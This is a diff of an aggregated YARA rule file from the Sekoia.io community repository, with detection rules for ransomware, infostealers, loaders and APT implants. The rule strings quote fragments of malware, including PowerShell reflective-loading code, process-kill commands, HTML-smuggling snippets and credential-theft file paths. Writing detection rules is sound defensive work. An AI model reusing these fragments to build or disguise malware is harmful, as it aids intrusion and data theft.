-		hash = "dced1acbbe11db2b9e7ae44a617f3c12d6613a8188f6a1ece0451e4cd4205156"
-		hash = "9d9dda39af17a37d92b429b68f4a8fc0a76e93ff1bd03f06258c51b73eb40efa"
-		logic_hash = "dbe75a34f91906fc275c04af0fc068923993bab37a7574b3fe38733d87f31835"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_unknown_sessionmanageriis_strings.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b1058b07c8e40431f8f3841b5ad49b4d6ead21a91d014f24c083f37eeacc5ac5"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -233430,167 +234188,184 @@ rule SEKOIA_Dropper_Mac_Lazarus_Manuscrypt : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "networksetup -getwebproxy '%s'" ascii
-		$ = "Cookie: _ga=%s%02d%d%d%02d%s" ascii
-		$ = "networksetup -listallnetworkservices" ascii
-		$ = "gid=%s%02d%d%03d%s" ascii
+		$ = "Wokring OK"
+		$ = "Delete File Success :"
+		$ = "Delete File Error :"
+		$ = "SM_SESSION="
+		$ = "SM_SESSIONID"
+		$ = "attachment; filename ="
+		$ = "CHttpModule::"
 
 	condition:
-		uint32( 0 ) == 0xFEEDFACF and all of them
+		uint16be( 0 ) == 0x4d5a and filesize > 100KB and filesize < 400KB and 4 of them
 }
-rule SEKOIA_Backdoor_Mul_Supershell_Client : FILE
+rule SEKOIA_Ransomware_Win_Shrinklocker
 {
 	meta:
-		description = "Detect the Supershell client (unpacked) by looking for github references"
+		description = "Detects files related to the ShrinkLocker ransomware"
 		author = "Sekoia.io"
-		id = "3498ca9e-a165-4dda-bc15-2e5d6d43d9c1"
-		date = "2024-04-25"
+		id = "93a6fbdd-ad62-456a-a1a5-b5ae3b242004"
+		date = "2024-06-07"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_mul_supershell_client.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "93490f4a16fb7dcde671b82e3187341abf4fc95e965219233ca7689f3cd3855f"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_shrinklocker.yar#L1-L25"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "7770b0946b9bb482f23c4ce0d753393e0d42a6fd8b31029847d74356296f0cf1"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "a42906f8b392089fa1fe3ea264f6cb549ce5437b5ea253d9e1b8dd94bf115dad"
-		hash2 = "d97b41e8cd6b63cd55c9a4f99ccadf5a9141088319bc9eb467d96e54080f3c85"
-		hash3 = "2b54d1c064892a22f48b5742ba6da55bf62b73e5b1e0649e8b7880b286498735"
-		hash4 = "0dedab2ef8d44f9beef782a29dd8f628dd0218b90f23f729b315660437019ccd"
-		hash5 = "2484de7944889d784b8229f4fd756d3930e55c91654921019db4437877e30ab7"
 
 	strings:
-		$ = "github.com/NHAS/reverse_ssh/internal/client/"
-		$ = "golang.org"
+		$a = "shrinkdisk" ascii fullword
+		$b = "BitLocker" ascii fullword
+		$c = "diskpart" ascii fullword
+		$d = "disk.vbs" ascii fullword
+		$e = "strDriveLetter" ascii fullword
+		$f = "shrinkcomplate" ascii fullword
+		$g = "ADODB.Stream" ascii fullword
+		$h = "Win32_OperatingSystem" ascii fullword
+		$i = "HKLM\\System\\CurrentControlSet\\Control\\Terminal Server" ascii fullword
+		$j = "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System" ascii fullword
+		$k = "HKLM\\SOFTWARE\\Policies\\Microsoft\\FVE" ascii fullword
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them
+		9 of them
 }
-rule SEKOIA_Apt_Badmagic_Commonmagic_Generic_1 : FILE
+rule SEKOIA_Apt_Apt28_Htmlsmuggling
 {
 	meta:
-		description = "Detects CommonMagic related implants"
+		description = "Detects some kind of HTMLSmuggling used by APT28"
 		author = "Sekoia.io"
-		id = "0b328771-f674-4606-bb30-d20d07c67832"
-		date = "2023-05-15"
+		id = "2e20c992-d971-4c0f-99b3-a7d528c7055a"
+		date = "2023-09-11"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_badmagic_commonmagic_generic_1.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "513226d050945af1a8bbc51f9a48936c815bfc6cd43b0766e34ac000d3c90625"
+		reference = "https://www.zscaler.com/blogs/security-research/steal-it-campaign"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_apt28_htmlsmuggling.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "47cca1d0a0843c8df43661ee8188dae86cce06e1f3982973871863728d328e89"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "\\CommonCommand\\Clean\\"
-		$ = "\\CommonCommand\\Overall\\"
-		$ = "\\CommonCommand\\Other\\"
-		$ = "\\CommonCommand\\Other\\*"
+		$s1 = "click();" ascii
+		$s2 = "window.location.replace("
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		$s1 in ( @s2 .. @s2-100 )
 }
-rule SEKOIA_Trojan_And_Keepspy : FILE
+
+rule SEKOIA_Installer_Win_Minibus : FILE
 {
 	meta:
-		description = "Finds KeepSpy samples based on specific strings"
+		description = "Detect MINIBUS installer"
 		author = "Sekoia.io"
-		id = "9390e7c8-a996-45cc-b642-c23d4b7dcf34"
-		date = "2023-06-28"
+		id = "0f7f600d-d93b-4b5a-aa0e-7d91038409e6"
+		date = "2024-04-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/trojan_and_keepspy.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "03a954a5585a9a80fdc5a0cd2644a819c540d43b260e040b627530ca88ee08fa"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/installer_win_minibus.yar#L4-L27"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "24326c9f5dcb7e66d47b65bf6bec6fe78be18c8d41a3039fbd09b453568a3f8f"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "26ca51cb067e1fdf1b8ad54ba49883bc5d1945952239aec0c4840754bff76621"
+		hash2 = "90fa29cc98be1d715df26d22079bdb8ce1d1fd3ce6a4efb39a4c192134e01020"
 
 	strings:
-		$str01 = "Characters entered %1$d of %2$d" ascii
-		$str02 = "com.google.android.material.behavior.HideBottomViewOnScrollBehavior" ascii
-		$str03 = "com/j256/ormlite/core/VERSION.txt" ascii
-		$str04 = "res/raw/empty.wav" ascii
-		$str05 = "res/mipmap/ic_launcher.png" ascii
-		$str06 = "res/interpolator/fast_out_slow_in.xml" ascii
-		$str07 = "OnePixelActivity" ascii
+		$ = "\\essential.dat"
+		$ = "TorvaldInitial.dll"
 
 	condition:
-		uint32be( 0 ) == 0x504B0304 and 6 of them and filesize > 2MB
+		uint16be( 0 ) == 0x4d5a and 1 of them or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "de3fb5d4419eb6b943872dd6e3dd93d19584ef2b158aa3158b3b09f0a9b628ef" )
 }
-
-rule SEKOIA_Apt_Windows_Wip19_Screencap : FILE
+rule SEKOIA_Koiloader_Powershell_Reflective_Loading : FILE
 {
 	meta:
-		description = "Detects ScreenCap resource"
+		description = "Powershell script loading service.exe (related to Koi Loader)"
 		author = "Sekoia.io"
-		id = "ebf5d2c5-81c9-45c3-aa61-05870f800f6b"
-		date = "2022-10-18"
+		id = "9bbe4cea-3e64-4377-bf93-def9fb629734"
+		date = "2024-03-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_windows_wip19_screencap.yar#L4-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "02479f0c8199b31f089608da0f44f1487b75790cb31c77bb65ca1fb0fd57ac0d"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/koiloader_powershell_reflective_loading.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "27deec01027a73129c6c8057eff1b48190c89ac18dcd7c390fc177d82a897290"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$s1 = "[Byte[]]$image" ascii fullword
+		$s2 = "function GDT"
+		$s3 = "function GPA"
+		$s4 = "GDT @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])"
+		$s5 = "$marshal::GetDelegateForFunctionPointer($CTAddr, $CTDeleg)"
+
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "89f4d0e3f7f3318270aa9c8345c1402202b1a02ffefc03c7a86636e297aa0ffc" ) and filesize < 2MB
+		$s1 at 0 and 4 of them
 }
-rule SEKOIA_Backdoor_Win_Sponsor : FILE
+rule SEKOIA_Ransomware_Win_Scransom : FILE
 {
 	meta:
-		description = "Detect the Sponsor backdoor"
+		description = "Finds ScRansom samples based on specific strings"
 		author = "Sekoia.io"
-		id = "d410cdb7-a2a8-481e-a90a-49ef15a7a0e3"
-		date = "2024-03-29"
+		id = "ea799295-1332-49c6-9816-035b91fc9b4f"
+		date = "2023-08-24"
 		modified = "2024-12-19"
-		reference = "https://www.welivesecurity.com/en/eset-research/sponsor-batch-filed-whiskers-ballistic-bobcats-scan-strike-backdoor/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_win_sponsor.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "844104863e8e0c49da3a41d39fe210e01329eeaecec6ffc231aae12392773ef6"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/ransomware_win_scransom.yar#L1-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "3b8034bc5e0919d6c05dd2f2079c40836f241f2db02c1baf70ecb530db90847f"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1 = "e5ee874bd59bb2a6dec700686544e7914312abff166a7390b34f7cb29993267a"
-		hash2 = "e2b74ed355d68bed2e7242baecccd7eb6eb480212d6cc54526bc4ff7e6f57629"
-		hash3 = "2a99cf7d73d453f3554e24bf3efa49d8109da9e8543db815a8f813559d083f8f"
-		hash4 = "c4dbda41c726af9ba3d9224f2e38fc433d2b60f4a23512437adeae8ef8986c57"
 
 	strings:
-		$ = "Content-Type: application/x-www-form-urlencoded"
-		$ = "SYSTEM\\CurrentControlSet\\Control\\TimeZoneInformation"
-		$ = "\\Uninstall.bat"
-		$ = "\\config.txt"
-		$ = "\\node.txt"
+		$str01 = "TIMATOMAFULL" wide
+		$str02 = ".Encrypted" wide
+		$str03 = ".Encrypting" wide
+		$str04 = "File Name :" wide
+		$str05 = "File size :" wide
+		$str06 = "TIMATOMA#" wide
+		$str07 = "Already Encrypted" wide
+		$str08 = "HOW TO RECOVERY FILES.TXT" wide
+		$str09 = "%d folder(s) searched and %d file(s) found - %.3f second(s)" wide
+		$str10 = "Search cancelled -" wide
+		$str11 = "note.txt" wide
+		$str12 = "Cannot sort the list while a search is in progress." wide
+		$str13 = "Cancelling search, please wait..." wide
+		$str14 = "Error showing process list" wide
+		$str15 = "[System Process]" wide
+		$str16 = "taskkill /f /im" wide
+		$str17 = "kill.bat" wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and all of them
+		uint16( 0 ) == 0x5a4d and 15 of them
 }
-rule SEKOIA_Apt_Sugargh0Stcampaign_Malicious_Lnk : FILE
+rule SEKOIA_Apt_Sidecopy_Reverserat_Strings : FILE
 {
 	meta:
-		description = "Detects malicious LNK used in SugarGh0st campaign"
+		description = "Detects SideCopy's ReverseRAT"
 		author = "Sekoia.io"
-		id = "4297c150-d125-49b9-8850-fcedf5284ae9"
-		date = "2023-12-01"
+		id = "383397c9-fd4a-4255-a8f2-27683bdbb7f7"
+		date = "2023-05-11"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_sugargh0stcampaign_malicious_lnk.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9efa131fdb02f31812c8a3f2053e1b60d0970c748eb0f82aed92a1c0719e048c"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_sidecopy_reverserat_strings.yar#L1-L23"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "be657405b5703dc402b53350aa7ef18529bda3dc44c759585c4cfa1bc1eb76ff"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -233598,26 +234373,30 @@ rule SEKOIA_Apt_Sugargh0Stcampaign_Malicious_Lnk : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "dir /S/b *.lnk " wide
-		$ = "%temp%\\*.lnk" wide
+		$ = "downloadexe" wide
+		$ = "creatdir" wide
+		$ = "regnewkey" wide
+		$ = "reglist" wide
+		$ = "regdelkey" wide
+		$ = "clipboardset" wide
+		$ = "shellexec" wide
+		$ = "SELECT maxclockspeed,  datawidth, name, manufacturer FROM Win32_Processor" wide
 
 	condition:
-		uint32be( 0 ) == 0x4c000000 and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and all of them
 }
-rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_2024 : FILE
+rule SEKOIA_Tool_Paexec_Strings : FILE
 {
 	meta:
-		description = "Detects HTML Smuggling webpages of Gamaredon used in 2024"
+		description = "Detects PAExec based on strings"
 		author = "Sekoia.io"
-		id = "8fa1f80b-2261-4d63-92d8-7c360be73fe2"
-		date = "2024-09-09"
+		id = "c48b897c-0d88-4fa9-b64b-0e14a38a62d7"
+		date = "2022-09-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_htmlsmuggling_2024.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "ab2807824e68d5efb4c896e1af82e693"
-		hash = "926b7e65d0d61cd6ba9e085193ae8b1d"
-		logic_hash = "9cd82f497fd7b82f02fec4ce1d131cd2685861c7c02aaae992e07a7d8bd30595"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_paexec_strings.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9c3bae822fd317bdc89c07542b05f6255d6af214071194570500eb2a12924ff6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -233625,102 +234404,73 @@ rule SEKOIA_Apt_Gamaredon_Htmlsmuggling_2024 : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "').innerHTML;window['" ascii fullword
-		$ = "='at'+'ob';"
-		$ = "]('*','');"
-		$ = "display:none"
-		$ = "0px;\" onerror=\""
-		$ = "'ev'+'"
-		$ = "<!DOCTYPE html PUBLIC"
+		$ = "\\\\%s\\%s\\PAExec_Move%u.dat" wide
+		$ = "PAExec_Move%u.dat" wide
+		$ = "Usage: PAExec [\\\\computer[,computer2[,...]]" wide
+		$ = "PAExec returning exit code %d" wide
 
 	condition:
-		5 of them and filesize < 1MB
+		uint16be( 0 ) == 0x4d5a and 3 of them and filesize < 500KB
 }
-rule SEKOIA_Apt_Coathanger_Files : FILE
+
+rule SEKOIA_Loader_Win_Jennlog
 {
 	meta:
-		description = "Detects COATHANGER files"
+		description = "Jennlog loader used to deliver the Apostle ransomware"
 		author = "Sekoia.io"
-		id = "615f5ac1-14bc-4f5b-a02e-7b13cd179917"
-		date = "2024-02-07"
+		id = "a69088e5-207f-494f-876b-766b8050e8c2"
+		date = "2021-10-04"
 		modified = "2024-12-19"
-		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_coathanger_files.yar#L1-L24"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5406d8a99e16f08f1ffca548ea1dd1e27e7707506e796e0fc263bcdbb681632d"
+		reference = "https://www.sentinelone.com/labs/new-version-of-apostle-ransomware-reemerges-in-targeted-attack-on-higher-education/"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_jennlog.yar#L4-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "0ffcd1f35570b28a1bd6f9a0361f8f921942f7345dcb2896fc092bb92f7d4d6d"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
-	strings:
-		$ = "/data2/"
-		$ = "/httpsd"
-		$ = "/preload.so"
-		$ = "/authd"
-		$ = "/tmp/packfile"
-		$ = "/smartctl"
-		$ = "/etc/ld.so.preload"
-		$ = "/newcli"
-		$ = "/bin/busybox"
-
 	condition:
-		( uint32( 0 ) == 0x464c457f or uint32( 4 ) == 0x464c457f ) and filesize < 5MB and 4 of them
+		pe.timestamp== 3140259112 or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "4c4577276ff0323d9aedcc39ecf2c964" ) or for any i in ( 0 .. pe.number_of_resources -1 ) : ( hash.sha256 ( pe.resources [ i ] . offset , pe.resources [ i ] . length ) == "8476a7fca587f1e5d3ae076293b9fbcccbebc4bd4f7b783228ad5da39305a3d9" )
 }
-rule SEKOIA_Infostealer_Win_Vidar_Strings_Nov23 : FILE
+
+rule SEKOIA_Backdoor_Win_Sidewinder_Cobaltstrike_2022_09
 {
 	meta:
-		description = "Finds Vidar samples based on the specific strings"
+		description = "Detect the SideWinder malware"
 		author = "Sekoia.io"
-		id = "b2c17627-f9b8-4401-b657-1cce560edc76"
-		date = "2023-11-10"
+		id = "b5e8f87a-4a2c-49bb-aa98-bf3fb5056b23"
+		date = "2022-10-24"
 		modified = "2024-12-19"
-		reference = "https://twitter.com/crep1x/status/1722652451319202242"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_vidar_strings_nov23.yar#L1-L33"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "1a2fc421fb4058b78de28d97d69b126e685f7677b7998f5b6ae3cbcee0ef3f00"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/backdoor_win_sidewinder_cobaltstrike_2022_09.yar#L4-L29"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f2b719170783c1bfaa4c4772e5cff73797be3056204566844c236d1857869e4c"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "MachineID:" ascii
-		$str02 = "Work Dir: In memory" ascii
-		$str03 = "[Hardware]" ascii
-		$str04 = "VideoCard:" ascii
-		$str05 = "[Processes]" ascii
-		$str06 = "[Software]" ascii
-		$str07 = "information.txt" ascii
-		$str08 = "%s\\*" ascii
-		$str09 = "Select * From AntiVirusProduct" ascii
-		$str10 = "SELECT target_path, tab_url from downloads" ascii
-		$str11 = "Software\\Martin Prikryl\\WinSCP 2\\Configuration" ascii
-		$str12 = "UseMasterPassword" ascii
-		$str13 = "Soft: WinSCP" ascii
-		$str14 = "<Pass encoding=\"base64\">" ascii
-		$str15 = "Soft: FileZilla" ascii
-		$str16 = "passwords.txt" ascii
-		$str17 = "build_id" ascii
-		$str18 = "file_data" ascii
+		$s1 = {65004e004500560045005200200047004f004e004e00410020004700490056004500200059004f0055002000550050002100}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 10 of ( $str* )
+		$s1 or pe.imphash ( ) == "b1e345b2d78e4b82617d995d18100790" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ac989507d4af352fa354560efef99ba6" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "8090b29a44c750b7b21287f9639fe747" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ea8693d6bacf3e7876f717a3d8abc433" )
 }
-rule SEKOIA_Apt_Emissarypanda_Sysupdate_Removing_Tool : FILE
+rule SEKOIA_Tool_Sy_Runas : FILE
 {
 	meta:
-		description = "Detects the SysUpdate removing tool"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "711d059c-6229-49ef-aa20-a04d505838dc"
-		date = "2022-08-03"
+		id = "cb1f3707-6716-49b5-9fe0-45c5baf2e491"
+		date = "2023-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_emissarypanda_sysupdate_removing_tool.yar#L1-L18"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "6a23fac99f26f4b0f9099e435ad53d9e83bf1322d190c565abf0c06dceeeaf34"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_sy_runas.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "b606f921b0ff6adf0e6979d43be0ddf77e2967e703562f1dea4406d1f5b3f5fd"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -233728,135 +234478,128 @@ rule SEKOIA_Apt_Emissarypanda_Sysupdate_Removing_Tool : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "KsWAYYYXXsFUCK" wide
-		$ = "remove Services:%s %d" wide
-		$ = "remove dir:%s %d" wide
-		$ = "remove reg %d" wide
+		$s1 = "Sy_Runas.exe" ascii wide
+		$s2 = "password *.exe" ascii wide
+		$s3 = "This tools just work on webshell" ascii wide
+		$s4 = "Code By slls124@gmail.com" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 11MB and 2 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them
 }
-rule SEKOIA_Trojan_Win_Bbtok_Iso_Sep23 : FILE
+rule SEKOIA_Infostealer_Win_Acrstealer_Str : FILE
 {
 	meta:
-		description = "Finds BBTok installation ISO file"
+		description = "Finds ACR Stealer standalone samples based on specific strings."
 		author = "Sekoia.io"
-		id = "6032853d-b872-4b2e-913d-366e7f3d0f32"
-		date = "2023-09-26"
+		id = "63b4d6ff-0cab-44ec-9d53-bb2612371a48"
+		date = "2024-04-22"
 		modified = "2024-12-19"
-		reference = "https://research.checkpoint.com/2023/behind-the-scenes-of-bbtok-analyzing-a-bankers-server-side-components/"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/trojan_win_bbtok_iso_sep23.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		hash = "140e83d2e0d012cdd5625ea89c3b3af05a80877cfc8215bbe20823e7e88c80b1"
-		logic_hash = "efef1e4e50d84cd30c025c86beb751c73a996cca896f90729571f48259ffc110"
+		reference = "https://github.com/SEKOIA-IO/Community"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_acrstealer_str.yar#L1-L29"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "53d313857577b39b51a3e396c078d39a8b8ab803295b689357c3e8ea94cac9f7"
 		score = 75
-		quality = 78
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$iso = {43 44 30 30 31}
-		$str01 = "POWERISO" ascii
-		$str02 = "%ProgramFiles(x86)%\\Microsoft\\Edge\\Application\\msedge.exe" ascii wide
-		$str03 = ".pdf /Y & start" wide
-		$str04 = "\\MSBuild.exe -nologo \\\\" ascii wide
+		$str01 = "ref.txt" ascii
+		$str02 = "Wininet.dll" ascii
+		$str03 = "Content-Type: application/octet-stream; boundary=----" ascii
+		$str04 = "POST" ascii
+		$str05 = "os_c" ascii fullword
+		$str06 = "en_k" ascii fullword
+		$str07 = "MyApp/1.0" ascii
+		$str08 = "/Up/b" ascii
+		$str09 = "Hello, World!" ascii
+		$str10 = "/ujs/" ascii
+		$str11 = "/Up/" ascii fullword
+		$str12 = "ostr" ascii fullword
+		$str13 = "brCH" ascii fullword
+		$str14 = "brGk" ascii fullword
+		$str15 = "https://steamcommunity.com/profiles/" ascii
 
 	condition:
-		all of them and filesize < 500KB
+		uint16( 0 ) == 0x5A4D and 10 of them
 }
-rule SEKOIA_Evilnumpayload_Fmtstr
+rule SEKOIA_Koiloader_Lnk : FILE
 {
 	meta:
-		description = "Detect payload of EvilNum"
+		description = "LNK file leading to deploy KoiLoader"
 		author = "Sekoia.io"
-		id = "980c58e4-e04d-4076-a92e-2c04ced19ece"
-		date = "2022-07-25"
+		id = "e82975b9-94b7-4de8-8cd5-d594aa80cf02"
+		date = "2024-03-20"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/evilnumpayload_fmtstr.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "7aa55d0677e58658bb76a2d7386a7434011b5f9b8c9de1b718c37f85907ddcc3"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/koiloader_lnk.yar#L1-L18"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
